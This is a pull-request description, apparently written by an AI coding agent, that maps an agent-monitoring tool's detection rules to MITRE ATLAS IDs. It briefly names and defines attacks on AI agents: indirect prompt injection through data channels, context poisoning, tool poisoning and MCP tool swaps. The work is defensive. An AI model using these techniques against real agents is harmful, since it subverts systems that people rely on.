## Every ID was resolved by name, and that caught real errors

Resolved against `dist/v6/ATLAS-2026.07.yaml`, pinned as **content release 2026.07, format-version 6.0.0**.

Two things worth flagging for anyone re-running this:

- `dist/ATLAS.yaml` self-reports as a **deprecated 5.6.0 snapshot**.
- `dist/ATLAS-latest.yaml` is an 18-byte **symlink**, not the data.

Resolving by name rather than from memory changed two of the four mappings in the original spec:

| Name | Commonly cited | Canonical (2026.07) |
|---|---|---|
| LLM Prompt Injection | `AML.T0051` | `AML.T0051` ✓ |
| Indirect prompt injection | `AML.T0054` | **`AML.T0051.001`** — `AML.T0054` is *LLM Jailbreak* |
| AI Agent Context Poisoning | `AML.T0059` / `AML.T0080` | **`AML.T0080`** — `AML.T0059` is *Erode Dataset Integrity* |
| AI Agent Tool Poisoning | `AML.T0099` | **`AML.T0110`** — `AML.T0099` is *AI Agent Tool **Data** Poisoning* |

Also corrected: `AML.TA0001` is *AI Attack Staging*, not Initial Access (that is `AML.TA0004`), and `AML.T0051` achieves `AML.TA0005` **Execution**.

## The table is one rule wide

Of fifteen built-in rules, exactly one describes an ATLAS technique:

| Rule | ATLAS |
|---|---|
| `untrusted-input-then-risky-action` | `AML.T0051.001` LLM Prompt Injection: Indirect (`AML.TA0005` Execution) |

The spec listed four mappings. In this codebase they collapse:

- **"Agent Data Injection (arXiv:2607.05120)" and `untrusted-input-then-risky-action` are the same rule.** That paper is cited in the rule's own docstring. Mapped to the sub-technique `AML.T0051.001` rather than the parent, because the content arrives through a data channel rather than a user prompt.
- **The MCP rug-pull is not a detection rule.** It is the `mcp_schema` event with `status: changed`, already tagged `AML.T0109 AI Supply Chain Rug Pull` in 7c0da21. `AML.T0080 AI Agent Context Poisoning` describes manipulating the context the model reads, which is a different thing from a server swapping its advertised tools, so it is left unmapped until a rule actually observes it.
- **No rule named `tool-data-poisoning` exists**, so `AML.T0110` has nothing to attach to.

Two techniques are deliberately never emitted, and tests enforce it: `AML.T0053 AI Agent Tool Invocation` is true of every event this product records, and `AML.T0050 Command and Scripting Interpreter` is ATLAS restating `T1059`. Both would make the field look populated while carrying nothing.

`test_exactly_one_built_in_rule_is_mapped` fails if the table grows, so expanding it has to be deliberate.

## Schema 1.2.0

Additive. Nothing moved, nothing changed meaning, nothing became required.

The first commit is a prerequisite rather than tidying: `SCHEMA_VERSION` existed in `canonical.py` while four builders emitted the string literal. Bumping the constant alone would have moved the version on tool calls while heartbeats, dispositions and detections carried on announcing 1.1.0.

Every fixture that constructs a **1.1.0 input** event stays at 1.1.0. Those are the backward-compatibility coverage, and rewriting them would have deleted it while looking tidy.

## Design notes

**Placement.** The block sits inside `detection`, matching `tool.atlas` and `mcp_schema.atlas`. One rule: the label lives next to the thing it labels.

**Omitted, never null.** A null forces consumers to distinguish "no ATLAS meaning" from "not yet classified"; here they are the same.

**`atlas_version` on every block**, including the two that shipped in 7c0da21. ATLAS renumbers, so an id in an old trail is not re-resolvable without it.

**YAML overrides raise, not drop.** A mapping silently discarded for a typo leaves the rule firing while the analyst believes it is tagged.

**`threat.*` stays ATT&CK-only.** An `AML.T****` there would corrupt any customer rollup grouping by technique without filtering on `threat.framework`.

## Not done, and why

The spec named `core/audit/detection/rules.py` and `policies/detection/manifest.yaml`. Both are ruleset-fingerprint inputs under the active dogfood freeze; editing either restarts a four-week clock currently at 1 of 4.

Same outcome, different files: the table lives in `core/audit/atlas.py`, attachment in `detection/live.py`, YAML support in `detection/yaml_rules.py`. None are fingerprint inputs. **Fingerprint unchanged at `56ad3de1`.** The manifest gains no `atlas:` entry, but the loader accepts one, so the override works today without moving the fingerprint.

## Verification

```
1068 passed (+36)
ruff             All checks passed
benchmark        50 cases, 26 detected, 0 missed, 0 FP, exit 0   (identical to master)
doctor           unaffected
fingerprint      56ad3de1  UNCHANGED
```

## For the maintainer

`AML.T0034.002 Agentic Resource Consumption` is a plausible future mapping for `subagent-swarm-burst`, but ATLAS frames it as an adversary *coercing* the agent into expensive calls, which the rule does not establish. Left unmapped rather than guessed.

I cannot sign the CLA on the maintainer's behalf; that needs a human action on the PR.

- Canonical ATLAS data: https://github.com/mitre-atlas/atlas-data
- CSA Agentic Gap Analysis: https://labs.cloudsecurityalliance.org/agentic/csa-research-note-atlas-agentic-gap-analysis-20260327
- Zenity 2026 ATLAS update: https://zenity.io/blog/current-events/mitre-atlas-ai-security
- This PR is enrichment only; per-host identity and fleet pilots are separate, higher-priority follow-ups.

🤖 Generated with [Claude Code](https://claude.com/claude-code)